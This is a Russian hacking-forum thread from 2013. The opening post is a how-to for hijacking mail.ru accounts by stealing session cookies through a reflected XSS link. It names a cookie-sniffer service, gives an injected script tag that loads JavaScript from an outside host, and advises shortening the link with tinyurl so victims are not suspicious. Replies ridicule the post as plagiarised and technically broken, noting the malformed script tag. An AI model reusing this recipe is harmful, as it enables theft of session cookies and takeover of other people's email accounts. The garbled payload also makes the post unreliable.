Взлом почты mail.ru XSS

Предыдущие сообщения
9 августа 2013
#1 Device uid#5284 Взлом почты mail.ru XSS :
1.Нам понадобиться Пассивка
2.Сниффер я буду использовать сниффер https://hacker-pro.net/sniffer/
3.Мозги и руки (откуда надо) !
Так регаемся и заходим на сниффер и берём Код для пассивной XSS

Крепим к пасивки XSS после знака ">
Код
http://mail.ru/###********=">(СЮДА)
Получается так:
Код
http://mail.ru/###********=">%3CSCRIPTtype=text/javascriptsrc=http://httpz.ru/6spsucqlgrgo.js></SCRIPT>"
Если жертва перейдёт по этой ссылке то куки придут на наш сниффер.
Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/

Подобным способом вожно взломать любые другие акаунты , главно найти уязвимость (НАПРИМЕР http://mail.ru/###********= ">;)

Если получилось не забываем ставить "+"
22:16:21 -2
#2 CryptoNeeD uid#5189 А что это? 00:09:59 0
#3 Device uid#5284
А что это?
Без коментариев
00:28:22 0
#4 nagibator uid#3515
А что это?
А вот это что?
00:32:36 0
#5 Flash_X uid#496 Geniusчто за хуйня и бред? чувак где ты там ксс видел? что за тег scripttype ? 06:37:38 0
#6 KO_ocher uid#5052
Один рабочий xss я знаю сейчас есть в гороскопах.Жаль что пассивка.Активку хотелось бы :)
11:54:55 0
#7 virtuoso uid#1428 Ты где это умудрился скопировать? 00:58:15 0
19 августа 2013
#8 s0me0nE uid#1920 Спизжено жи!
Как и всё, что постит юзер, под ником Device.
Пруф(первая попавшаяся ссылка в гугле, которых там много(причём постил в основном небезызвестный школоксакеп tickhack или как-то так)):
http://xabar.ucoz.com/forum/28-17-1

Девайс, воровать чужое без осмысления - моветон, одно дело если бы ты переосмыслил и написал с чистого листа с дополнительными подробностями и разными другими вкусностями. Вспоминается: "Жулик, не воруй!"
01:09:38 0
#9 Flash_X uid#496 Geniusсм. пост #5 02:16:42 0
20 августа 2013
#10 Device uid#5284 блять http://xabar-stalkera.com/ и http://xabar.ucoz.com мои сайты В чом обвиняете? украл сам у себя? 22:10:27 0
#11 s0me0nE uid#1920
блять http://xabar-stalkera.com/ и http://xabar.ucoz.com мои сайты В чом обвиняете? украл сам у себя?
Пруфы в студию!
И даже если так, то сходность со статьёй тикхака(школолои) не может быть незаметна.
22:33:59 0
21 августа 2013
#12сообщение удалено
#13 s0me0nE uid#1920 Античат 01.02.2012, 14:22
А без капса никак?
И это не хсс а способ её эксплуатации(пояснение для дилетантов вроде тебя).
ИМХО Ладно, ещё бы просто воровали статьи, но вы даже сами в них не шарите. Сей факт показывает вашу некомпетентность в данном вопросе.
00:37:13 0
#14сообщение удалено
#15 virtuoso uid#1428 Если бы я не знал что такое XSS я бы не черта не понял что тут делать. А если бы и понял как украсть cookie то уш темболие не понял что с ними делать.
p.s Если уже что то делаешь делай нормально. И каким раком тут описывается взлом mail.ru?
05:03:35 0
#16 CryptoNeeD uid#5189
сообщение удалено
Тот кто это сделал, знай, ты станешь импотентом к 30-ти годам.
13:49:47 0
#17 Flash_X uid#496 Geniushttp://hackersoft.ru/users/CryptoNeeD/
там видно будет
18:27:53 0
29 августа 2013
#18 SQL uid#5351 тот снифер перенаправляет мення на hpc.name 02:05:35 0
#19 virtuoso uid#1428
Ты ведь специализируешься на XSS!!! xD
04:56:11 1
#20 s0me0nE uid#1920 SQL, на hpc находится более-менее популярный сниффер. 01:09:28 0
Следующие сообщения
*Ник: Проверка уникальности... Если вы уже зарегистрированы, авторизуйтесь.
*Сообщение:
  Загрузка...